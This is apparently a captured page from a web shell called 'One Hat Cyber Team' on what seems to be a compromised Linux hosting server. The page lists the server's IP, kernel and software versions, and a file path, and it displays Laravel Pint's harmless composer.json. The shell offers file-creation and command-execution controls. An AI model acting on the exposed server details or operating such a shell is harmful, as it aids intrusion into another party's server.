One Hat Cyber Team
Your IP :
3.141.45.137
Server IP :
103.133.214.160
Server :
Linux venus.ewebguru.net 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
Server Software :
Apache/2
PHP Version :
8.1.30
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
praval
/
public_html
/
core
/
vendor
/
laravel
/
pint
/
View File Name :
composer.json
{ "name": "laravel/pint", "description": "An opinionated code formatter for PHP.", "keywords": ["php", "format", "formatter", "lint", "linter"], "homepage": "https://laravel.com", "type": "project", "license": "MIT", "support": { "issues": "https://github.com/laravel/pint/issues", "source": "https://github.com/laravel/pint" }, "authors": [ { "name": "Nuno Maduro", "email": "enunomaduro@gmail.com" } ], "require": { "php": "^8.1.0", "ext-json": "*", "ext-mbstring": "*", "ext-tokenizer": "*", "ext-xml": "*" }, "require-dev": { "friendsofphp/php-cs-fixer": "^3.47.1", "illuminate/view": "^10.41.0", "larastan/larastan": "^2.8.1", "laravel-zero/framework": "^10.3.0", "mockery/mockery": "^1.6.7", "nunomaduro/termwind": "^1.15.1", "pestphp/pest": "^2.31.0" }, "autoload": { "psr-4": { "App\\": "app/", "Database\\Factories\\": "database/factories/", "Database\\Seeders\\": "database/seeders/" } }, "autoload-dev": { "psr-4": { "Scripts\\": "scripts/", "Tests\\": "tests/" } }, "config": { "preferred-install": "dist", "sort-packages": true, "optimize-autoloader": true, "platform": { "php": "8.1.0" }, "allow-plugins": { "pestphp/pest-plugin": true } }, "minimum-stability": "dev", "prefer-stable": true, "bin": ["builds/pint"] }